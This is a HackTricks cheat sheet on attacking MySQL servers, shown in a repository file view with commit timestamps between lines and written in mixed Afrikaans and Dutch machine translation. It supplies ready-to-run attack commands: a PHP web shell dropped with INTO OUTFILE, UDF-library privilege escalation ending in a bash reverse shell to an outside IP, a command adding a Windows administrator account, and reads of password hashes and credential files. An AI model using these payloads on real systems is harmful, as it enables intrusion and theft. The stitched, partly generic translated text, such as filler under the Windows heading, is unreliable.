hacktricks/network-services-pentesting/pentesting-mysql.md

765 lines
29 KiB
Markdown
Raw Normal View History

2022-05-01 13:25:53 +00:00
# 3306 - Pentesting Mysql
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2024-02-03 01:15:34 +00:00
2024-02-11 02:07:06 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-04-06 18:08:38 +00:00
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-02-11 02:07:06 +00:00
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
2022-04-28 16:01:33 +00:00
</details>
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2024-02-11 02:07:06 +00:00
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2024-02-11 02:07:06 +00:00
## **Basiese Inligting**
2024-02-11 02:07:06 +00:00
**MySQL** kan beskryf word as 'n oopbron **Relational Database Management System (RDBMS)** wat gratis beskikbaar is. Dit werk met die **Structured Query Language (SQL)**, wat die bestuur en manipulasie van databasisse moontlik maak.
2024-02-11 02:07:06 +00:00
**Verstekpoort:** 3306
2024-04-06 18:08:38 +00:00
```
3306/tcp open mysql
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
## **Verbind**
2024-02-11 02:07:06 +00:00
### **Lokaal**
2024-04-06 18:08:38 +00:00
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
### Afstandbediening
MySQL kan op afstand worden benaderd via het netwerk. Dit betekent dat een aanvaller toegang kan krijgen tot de MySQL-server vanaf een externe locatie. Dit kan worden gedaan door het IP-adres en de poort van de MySQL-server te achterhalen en vervolgens een verbinding tot stand te brengen met behulp van een MySQL-client.
Om te voorkomen dat een aanvaller toegang krijgt tot de MySQL-server via externe verbindingen, moet de configuratie van de MySQL-server worden aangepast. Dit kan worden gedaan door de bind-address-instelling in het configuratiebestand van MySQL te wijzigen. Door deze instelling te wijzigen in het IP-adres van de lokale machine, wordt voorkomen dat externe verbindingen worden geaccepteerd.
2024-02-11 02:07:06 +00:00
Het is ook belangrijk om sterke en veilige wachtwoorden te gebruiken voor de MySQL-gebruikersaccounts. Dit helpt bij het voorkomen van brute force-aanvallen waarbij een aanvaller probeert in te loggen op de MySQL-server door verschillende combinaties van gebruikersnamen en wachtwoorden te proberen.
2024-02-11 02:07:06 +00:00
Daarnaast is het belangrijk om de MySQL-server regelmatig bij te werken met de nieuwste beveiligingspatches. Dit helpt bij het dichten van eventuele beveiligingslekken die kunnen worden misbruikt door aanvallers.
Ten slotte kan het gebruik van een firewall ook helpen bij het beperken van de toegang tot de MySQL-server. Door alleen specifieke IP-adressen toe te staan om verbinding te maken met de MySQL-server, kan de blootstelling aan externe aanvallen worden verminderd.
2024-04-06 18:08:38 +00:00
```bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
## Eksterne Enumerasie
2024-02-11 02:07:06 +00:00
Sommige van die enumerasie-aksies vereis geldige geloofsbriewe
2024-04-06 18:08:38 +00:00
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
2021-03-11 19:59:32 +00:00
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
2024-02-11 02:07:06 +00:00
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
2024-04-06 18:08:38 +00:00
2022-05-11 19:00:10 +00:00
### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql)
2024-02-11 02:07:06 +00:00
### Skryf enige binêre data neer
2024-04-06 18:08:38 +00:00
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
## **MySQL-opdragte**
2024-04-06 18:08:38 +00:00
```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
2022-10-02 21:10:53 +00:00
show columns from <table>;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
2022-05-11 19:00:10 +00:00
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
2022-10-03 00:11:21 +00:00
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
2020-11-04 22:09:50 +00:00
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
### MySQL Toestemmingsopsporing
MySQL-toestemmingsopsporing is een belangrijk onderdeel van het pentestproces, omdat het helpt bij het identificeren van mogelijke beveiligingslekken in een MySQL-database. Door de toestemmingsinstellingen van een MySQL-gebruiker te controleren, kunnen we bepalen welke acties de gebruiker kan uitvoeren op de database.
Hier zijn enkele methoden die kunnen worden gebruikt om MySQL-toestemmingen te onderzoeken:
#### 1. Gebruikerslijst weergeven
Om de lijst met gebruikers in een MySQL-database weer te geven, kunnen we de volgende query uitvoeren:
```sql
SELECT user FROM mysql.user;
```
#### 2. Toestemmingen van een specifieke gebruiker controleren
Om de toestemmingen van een specifieke gebruiker te controleren, kunnen we de volgende query uitvoeren:
```sql
SHOW GRANTS FOR 'gebruikersnaam'@'localhost';
```
#### 3. Toegang tot databases controleren
Om te controleren welke databases een gebruiker kan benaderen, kunnen we de volgende query uitvoeren:
```sql
SHOW DATABASES;
```
#### 4. Toegang tot tabellen controleren
Om te controleren welke tabellen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren:
```sql
SHOW TABLES FROM 'databasenaam';
```
#### 5. Toegang tot kolommen controleren
Om te controleren welke kolommen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren:
```sql
SHOW COLUMNS FROM 'databasenaam'.'tabelnaam';
```
#### 6. Toegang tot specifieke SQL-opdrachten controleren
2024-02-11 02:07:06 +00:00
Om te controleren of een gebruiker specifieke SQL-opdrachten kan uitvoeren, kunnen we de volgende query uitvoeren:
2022-10-08 17:31:10 +00:00
2024-02-11 02:07:06 +00:00
```sql
SHOW GRANTS FOR 'gebruikersnaam'@'localhost' LIKE '%opdracht%';
```
Het controleren van MySQL-toestemmingen is essentieel om mogelijke beveiligingslekken te identificeren en de beveiliging van een MySQL-database te verbeteren. Door deze methoden toe te passen, kunnen we de toegangsrechten van gebruikers nauwkeurig beoordelen en eventuele kwetsbaarheden opsporen.
2024-04-06 18:08:38 +00:00
2022-10-08 17:31:10 +00:00
```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
2022-12-21 22:55:15 +00:00
# Get users, permissions & hashes
SELECT * FROM mysql.user;
2022-10-08 17:31:10 +00:00
#From DB
2024-02-11 02:07:06 +00:00
select * from mysql.user where user='root';
2022-10-08 17:31:10 +00:00
## Get users with file_priv
2022-12-21 19:36:44 +00:00
select user,file_priv from mysql.user where file_priv='Y';
2022-10-08 17:31:10 +00:00
## Get users with Super_priv
2022-12-21 19:36:44 +00:00
select user,Super_priv from mysql.user where Super_priv='Y';
2022-10-08 17:31:10 +00:00
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
2022-12-21 22:55:15 +00:00
#@ Functions not from sys. db
2022-12-23 06:41:52 +00:00
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
2022-10-08 17:31:10 +00:00
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
Jy kan in die dokumentasie die betekenis van elke voorreg sien: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)
2022-10-08 17:31:10 +00:00
2024-02-11 02:07:06 +00:00
### MySQL-lêer RCE
2022-10-08 17:31:10 +00:00
{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
## MySQL willekeurige lees van lêer deur klient
2024-02-11 02:07:06 +00:00
Eintlik, wanneer jy probeer om **data plaaslik in 'n tabel te laai**, vra die MySQL- of MariaDB-bediener die **kliënt om dit te lees** en die inhoud te stuur. **As jy dus 'n mysql-kliënt kan manipuleer om na jou eie MySQL-bediener te verbind, kan jy willekeurige lêers lees.**\
Let asseblief daarop dat dit die gedrag is wanneer jy gebruik maak van:
2024-04-06 18:08:38 +00:00
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
(Notisie die "plaaslike" woord)\
Want sonder die "plaaslike" kan jy kry:
2024-04-06 18:08:38 +00:00
```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
**Aanvanklike PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**In hierdie dokument kan jy 'n volledige beskrywing van die aanval sien en selfs hoe om dit uit te brei na RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Hier kan jy 'n oorsig van die aanval vind:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
2024-02-11 02:07:06 +00:00
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheid geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n broeiplek vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-05-01 13:25:53 +00:00
## POST
2024-02-11 02:07:06 +00:00
### Mysql-gebruiker
2024-02-11 02:07:06 +00:00
Dit sal baie interessant wees as mysql as **root** uitgevoer word:
2024-04-06 18:08:38 +00:00
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
2022-05-11 19:00:10 +00:00
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
#### Gevaarlike Instellings van mysqld.cnf
2024-02-11 02:07:06 +00:00
In die konfigurasie van MySQL-dienste word verskeie instellings gebruik om sy werking en veiligheidsmaatreëls te definieer:
2024-02-08 21:36:15 +00:00
2024-04-06 18:08:38 +00:00
* Die **`user`**-instelling word gebruik om die gebruiker aan te dui waarin die MySQL-diens uitgevoer sal word.
* **`password`** word gebruik om die wagwoord wat verband hou met die MySQL-gebruiker, te vestig.
* **`admin_address`** spesifiseer die IP-adres wat luister vir TCP/IP-verbindings op die administratiewe netwerkinterface.
* Die **`debug`**-veranderlike dui op die huidige foutopsporingskonfigurasies, insluitend sensitiewe inligting binne loglêers.
* **`sql_warnings`** bestuur of inligtingstrengs gegenereer word vir enkelry-invoegingsopdragte wanneer waarskuwings voorkom, insluitend sensitiewe data binne loglêers.
* Met **`secure_file_priv`** word die omvang van data-invoer- en uitvoeroperasies beperk om die veiligheid te verbeter.
2022-10-02 21:10:53 +00:00
2024-02-11 02:07:06 +00:00
### Voorregverhoging
2024-04-06 18:08:38 +00:00
2022-05-11 19:00:10 +00:00
```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
2022-12-21 22:55:15 +00:00
# Get users, permissions & creds
SELECT * FROM mysql.user;
2022-05-11 19:00:10 +00:00
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"
# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
### Voorregverhoging via biblioteek
2024-02-11 02:07:06 +00:00
As die **mysql-bediener as root** (of 'n ander meer bevoorregte gebruiker) loop, kan jy dit dwing om opdragte uit te voer. Hiervoor moet jy **gebruikersgedefinieerde funksies** gebruik. En om 'n gebruikersgedefinieerde funksie te skep, het jy 'n **biblioteek** nodig vir die bedryfstelsel waarop mysql loop.
2022-05-11 19:00:10 +00:00
2024-02-11 02:07:06 +00:00
Die skadelike biblioteek wat gebruik moet word, kan binne sqlmap en binne metasploit gevind word deur **`locate "*lib_mysqludf_sys*"`** uit te voer. Die **`.so`** lêers is **Linux**-biblioteke en die **`.dll`** is die **Windows**-eenhede, kies die een wat jy benodig.
2022-05-11 19:00:10 +00:00
2024-02-11 02:07:06 +00:00
As jy **nie daardie biblioteke het nie**, kan jy dit óf **soek**, óf hierdie [**Linux C-kode**](https://www.exploit-db.com/exploits/1518) aflaai en **dit binne die kwesbare Linux-masjien kompileer**:
2024-04-06 18:08:38 +00:00
2022-05-11 19:00:10 +00:00
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
Nou dat jy die biblioteek het, teken binne in die Mysql as 'n bevoorregte gebruiker (root?) en volg die volgende stappe:
2022-05-01 13:25:53 +00:00
#### Linux
2024-04-06 18:08:38 +00:00
```sql
2022-05-11 19:00:10 +00:00
# Use a database
use mysql;
2022-05-11 19:00:10 +00:00
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
2022-05-11 19:00:10 +00:00
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
2022-05-11 19:00:10 +00:00
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
2022-05-11 19:00:10 +00:00
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
2024-04-06 18:08:38 +00:00
2022-05-01 13:25:53 +00:00
#### Windows
2024-04-06 18:08:38 +00:00
**MySQL Service Enumeration**
2024-02-11 02:07:06 +00:00
Om te begin, moet jy die MySQL-diens op die teikenstelsel identifiseer. Jy kan dit doen deur die volgende stappe te volg:
1. Voer 'n skandering van die teikenstelsel uit om aktiewe poorte te identifiseer.
2. Kyk vir die poortnommer 3306, wat die standaardpoort vir MySQL is.
3. As die poort 3306 oop is, dui dit daarop dat die MySQL-diens op die stelsel loop.
2024-04-06 18:08:38 +00:00
**MySQL Service Exploitation**
2024-02-11 02:07:06 +00:00
As jy 'n MySQL-diens op die teikenstelsel geïdentifiseer het, kan jy probeer om dit te misbruik om toegang tot die stelsel te verkry. Hier is 'n paar moontlike aanvalstegnieke:
1. **Brute force-aanval**: Probeer om in te log by die MySQL-diens deur verskillende gebruikersname en wagwoorde te probeer.
2. **SQL-injeksie**: Ondersoek die webtoepassings wat met die MySQL-diens gekoppel is, vir moontlike SQL-injeksiekwessies wat jy kan uitbuit om toegang te verkry.
3. **Gebruikersprivilege-uitbreiding**: As jy toegang het tot 'n beperkte gebruikerrekening, probeer om jou gebruikersprivileges uit te brei deur spesiale MySQL-opdragte uit te voer.
4. **Databasislek**: Ondersoek die databasis vir gevoelige inligting soos wagwoorde, kredietkaartinligting, ens.
2024-04-06 18:08:38 +00:00
**MySQL Service Post-Exploitation**
2024-02-11 02:07:06 +00:00
As jy toegang tot die MySQL-diens verkry het, kan jy verskeie post-exploitasietegnieke gebruik om verdere toegang tot die stelsel te verkry of om inligting te versamel:
1. **Gebruikersrekeninguitbreiding**: Skep 'n nuwe gebruikerrekening met hoër privilegeniveaus om verdere toegang tot die stelsel te verkry.
2. **Databasisverkenning**: Ondersoek die databasis vir waardevolle inligting soos gebruikersname, wagwoorde, kredietkaartinligting, ens.
3. **Databasismanipulasie**: Verander of verwyder data in die databasis om die werking van die toepassing of die stelsel te beïnvloed.
4. **Databasisrugsteun**: Maak 'n rugsteunkopie van die databasis om belangrike inligting te bewaar of om dit later te gebruik.
2024-04-06 18:08:38 +00:00
**MySQL Service Hardening**
2024-02-11 02:07:06 +00:00
Om die veiligheid van die MySQL-diens te verhoog, kan jy die volgende maatreëls toepas:
1. **Sterk wagwoorde**: Verseker dat alle gebruikersrekeninge sterk en unieke wagwoorde het.
2. **Beperkte gebruikersprivileges**: Gee slegs die nodige privilegies aan elke gebruikerrekening en beperk die toegang tot kritieke databasisfunksies.
3. **Bywerk van sagteware**: Verseker dat die MySQL-diens en alle verbonde sagteware op die jongste weergawes is om bekende kwessies en lekke te vermy.
4. **Netwerkbeperkings**: Beperk die toegang tot die MySQL-diens deur slegs spesifieke IP-adresse of subnette toe te laat.
5. **Logbestuur**: Monitor en analiseer die loglêers van die MySQL-diens vir enige verdagte aktiwiteite of pogings tot aanvalle.
2024-04-06 18:08:38 +00:00
```sql
2022-05-11 19:00:10 +00:00
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
2022-05-11 19:00:10 +00:00
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
### Uittreksel van MySQL-gelde van lêers
2024-02-11 02:07:06 +00:00
Binne _/etc/mysql/debian.cnf_ kan jy die **plain-tekswagwoord** van die gebruiker **debian-sys-maint** vind.
2024-04-06 18:08:38 +00:00
```bash
cat /etc/mysql/debian.cnf
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
Jy kan **hierdie geloofsbriewe gebruik om in die MySQL-databasis in te teken**.
2024-02-11 02:07:06 +00:00
Binne die lêer: _/var/lib/mysql/mysql/user.MYD_ kan jy **al die hasings van die MySQL-gebruikers** vind (diegene wat jy kan onttrek uit mysql.user binne die databasis)_._
2024-02-11 02:07:06 +00:00
Jy kan hulle onttrek deur die volgende te doen:
2024-04-06 18:08:38 +00:00
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
2024-04-06 18:08:38 +00:00
2024-02-11 02:07:06 +00:00
### Aktivering van logging
2024-02-11 02:07:06 +00:00
U kan die log van MySQL navrae aktiveer deur die volgende lyne in `/etc/mysql/my.cnf` te ontkommentarieer:
![](<../.gitbook/assets/image (277).png>)
2024-02-11 02:07:06 +00:00
### Nuttige lêers
2024-02-11 02:07:06 +00:00
Konfigurasie-lêers
2022-05-01 13:25:53 +00:00
* windows \*
2024-02-11 02:07:06 +00:00
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \<InstDir>/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* Opdraggeskiedenis
* \~/.mysql.history
* Log-lêers
* connections.log
* update.log
* common.log
## Standaard MySQL-databasis/tabelle
2020-09-16 22:27:27 +00:00
2022-05-01 13:25:53 +00:00
ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
2022-05-01 13:25:53 +00:00
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
2022-05-01 13:25:53 +00:00
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
2022-05-01 13:25:53 +00:00
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
2022-05-01 13:25:53 +00:00
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
2022-05-01 13:25:53 +00:00
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
2022-05-01 13:25:53 +00:00
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
2022-05-01 13:25:53 +00:00
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
2022-05-01 13:25:53 +00:00
USER\_PRIVILEGES\
VIEWS\
2022-05-01 13:25:53 +00:00
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS
2020-09-16 22:27:27 +00:00
2022-05-01 13:25:53 +00:00
columns\_priv\
column\_stats\
db\
2022-05-01 13:25:53 +00:00
engine\_cost\
event\
func\
2022-05-01 13:25:53 +00:00
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
2022-05-01 13:25:53 +00:00
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
2022-05-01 13:25:53 +00:00
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
2022-05-01 13:25:53 +00:00
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
2020-09-16 22:27:27 +00:00
user
accounts\
2022-05-01 13:25:53 +00:00
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
2022-05-01 13:25:53 +00:00
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
2022-05-01 13:25:53 +00:00
user\_variables\_by\_thread\
users\
2022-05-01 13:25:53 +00:00
variables\_by\_thread
2020-09-16 22:27:27 +00:00
2022-05-01 13:25:53 +00:00
host\_summary\
host\_summary\_by\_file\_io\
host\_summary\_by\_file\_io\_type\
host\_summary\_by\_stages\
host\_summary\_by\_statement\_latency\
host\_summary\_by\_statement\_type\
innodb\_buffer\_stats\_by\_schema\
innodb\_buffer\_stats\_by\_table\
innodb\_lock\_waits\
io\_by\_thread\_by\_latency\
io\_global\_by\_file\_by\_bytes\
io\_global\_by\_file\_by\_latency\
io\_global\_by\_wait\_by\_bytes\
io\_global\_by\_wait\_by\_latency\
latest\_file\_io\
